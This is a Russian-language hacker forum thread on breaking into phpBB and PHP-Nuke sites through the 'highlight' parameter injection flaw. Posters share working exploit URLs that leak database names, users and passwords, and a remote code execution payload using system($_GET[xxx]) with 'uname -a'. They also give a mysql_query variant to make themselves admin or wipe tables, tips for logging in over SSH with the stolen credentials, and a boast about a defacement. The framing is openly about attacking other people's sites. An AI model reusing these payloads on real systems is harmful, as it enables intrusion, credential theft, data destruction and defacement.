Зашёл на портал на движке phpпуке
Допустим www.mega-lol.net
Стырил пароль от базы и имя

&highlight=%2527.$poster=$dbpass.%2527
&highlight=%2527.$poster=$dbname.%2527

Как мне быть дальше?

Так. Серьезно. Ответь, сколько ты куриш?
Ты зря этим делом занимаешься,
если бы не курил ПЛАН, знал бы что
highlight в phpBB ))

Если ты там стырил пас от MySQL, то теперь делай так
Напиши его в блокнот
Закрой блокнот
Не сохраняй изменения
Забей на пароль

Теперь используй сплойт чтобы выполнить произвольные комманды на уязвимой с-ме!))

Уже писал МИЛИОН раз про highlight.
И ещё напишу
viewtopic.php?xxx=uname -a&t=[TOPIC]&highlight=%2527.system($_GET[xxx]).include%2527

Незабудь вместо [TOPIC] поставить номер топика

Спасибо, неленивый ты :)
Я некурю))))

Спасибо ))

xxx- эт что?
uname- эт что?

xxx - это параметр в строке в который нужно писать команду, ее запустит system()
uname - это команда nix показывающая версию ОС и другое. с параметром a - версию Linux

Ребята прошу вас объясните мне ламеру, как нужнно взламывать сайты на Phpnuke.
как ни стараюсь не получается. прошу вас помггите.

1. ага... сейчас остались критические уязвимости в нюке 7,5 7,6 ? На секьюрити только XSS и то херь :(

2. 2KEZ, При создании нюка создаётся профиль базового админа форума (редактирование его параметров запрещено) Всё его данные находятся в бд определённой яцейке (название непоню сейчас точно) Можно ли с помощью

&highlight=%2527.system($_GET[xxx]).include%2527

Очистить данные этой ячейки, тем самым введя supersite.ru/admin.pnp создать по новой базового администратора?

Danke... =)

Какие ячейки? Я тебе про ПЛАН говорил? )) Ладно шучу ))

Вообщем если у тебя есть шелл (HTTP) я незнаю о каких админах ты можешь говорить...
Ты можешь например делать вместо system($_GET[xxx]) mysql_query($_GET[xxx])
и вместо xxx писать SQL команды
Например UPDATE phpbb_users SET user_level=1 WHERE user_id=[ТВОЙ ID]
Или стереть все таблицы...

А phpNuke ТУТ ВООБЩЕ НЕ ПРИ ЧЕМ. Разве что phpBB бывает модулем в нюке.

Занимательно....., Спасибо!

так.... видать на вопрос не ответили ему =))

&highlight=%2527.$poster=$dbname.%2527
&highlight=%2527.$poster=$dbpass.%2527
ничего полезного тебе НЕ ДАЮТ !!!!

набери &highlight=%2527.$poster=$dbhost.%2527 еси там будет localhost, смело забивай на это дело...

а так те надо набрать:
&highlight=%2527.$poster=$dbuser.%2527
&highlight=%2527.$poster=$dbpasswd.%2527

это тебе даст логин и пароль от БД !!!

далее конектишься по SSH туда и всего делов.. считай сайт взломан =))
(у меня через это был первый дефейс:) )